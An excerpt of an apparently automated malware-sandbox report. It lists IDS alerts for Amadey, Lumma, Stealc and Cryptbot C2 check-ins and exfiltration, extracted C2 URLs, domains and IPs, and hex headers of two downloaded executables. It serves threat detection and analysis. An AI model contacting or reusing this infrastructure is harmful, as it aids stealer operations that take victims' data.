                          Source: chrome.exeMemory has grown: Private usage: 19MB later: 41MB
                          Source: firefox.exeMemory has grown: Private usage: 1MB later: 187MB

                          Networking

                          barindex
                          Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49758 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49764
                          Source: Network trafficSuricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.4:49796 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057730 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs) : 192.168.2.4:63103 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49820 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49819 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49827 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49833 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49839 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49844 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49847 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49846 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49846 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49846
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49855 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49846 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49863 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49846
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49866 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49846 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49867 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49874 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49877 -> 34.116.198.130:80
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49895 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49901 -> 34.116.198.130:80
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49904 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49924 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49920 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49942 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49912 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49954 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:49970 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50015 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50025 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50046 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:50029 -> 34.116.198.130:80
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50061 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50057 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50087 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50100 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50121 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50108 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50105 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50128 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50147 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50136 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50162 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50167 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50185 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50178 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:50321 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057730 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs) : 192.168.2.4:65519 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50373 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50392 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50374 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50393 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50382 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50377 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50379 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50386 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50383 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50387 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50371
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50375 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50398 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50395 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50380 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50378 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50390 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50400 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50399 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50402 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50154 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057730 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs) : 192.168.2.4:52900 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50413 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50384 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.4:50404 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49827 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49827 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49833 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49820 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49820 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49874 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49874 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49863 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49863 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49970 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50015 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50015 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49954 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50025 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50025 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50100 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50100 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50121 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50121 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50136 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50108 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50185 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50178 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50128 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50373 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50373 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50375 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50375 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50387 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50387 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50380 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50390 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50390 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50392 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50413 -> 188.114.97.3:443
                          Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
                          Source: Malware configuration extractorURLs: processhol.sbs
                          Source: Malware configuration extractorURLs: peepburry828.sbs
                          Source: Malware configuration extractorURLs: p3ar11fter.sbs
                          Source: Malware configuration extractorURLs: p10tgrace.sbs
                          Source: Malware configuration extractorURLs: 3xp3cts1aim.sbs
                          Source: Malware configuration extractorIPs: 185.215.113.43
                          Source: unknownNetwork traffic detected: DNS query count 34
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 21 Nov 2024 11:10:11 GMTContent-Type: application/octet-streamContent-Length: 4406272Last-Modified: Thu, 21 Nov 2024 10:52:35 GMTConnection: keep-aliveETag: "673f10f3-433c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 50 c5 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 c5 00 00 04 00 00 dc db 43 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 39 c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 39 c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 e0 70 00 00 10 00 00 00 78 27 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 f0 70 00 00 00 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 00 71 00 00 02 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 38 00 00 10 71 00 00 02 00 00 00 8a 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 64 62 66 63 78 73 77 00 90 1b 00 00 b0 a9 00 00 8a 1b 00 00 8c 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 70 72 77 6e 77 6f 69 00 10 00 00 00 40 c5 00 00 04 00 00 00 16 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 c5 00 00 22 00 00 00 1a 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 21 Nov 2024 11:10:24 GMTContent-Type: application/octet-streamContent-Length: 1925632Last-Modified: Thu, 21 Nov 2024 10:53:57 GMTConnection: keep-aliveETag: "673f1145-1d6200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 e6 72 3b 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 10 04 00 00 be 00 00 00 00 00 00 00 40 4c 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4c 00 00 04 00 00 1d aa 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 70 05 00 70 00 00 00 00 60 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 71 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 05 00 00 10 00 00 00 5e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 60 05 00 00 02 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 70 05 00 00 02 00 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2b 00 00 80 05 00 00 02 00 00 00 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 61 78 66 73 7a 77 69 00 d0 1a 00 00 60 31 00 00 c8 1a 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 69 76 73 7a 61 71 6d 00 10 00 00 00 30 4c 00 00 04 00 00 00 3c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4c 00 00 22 00 00 00 40 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
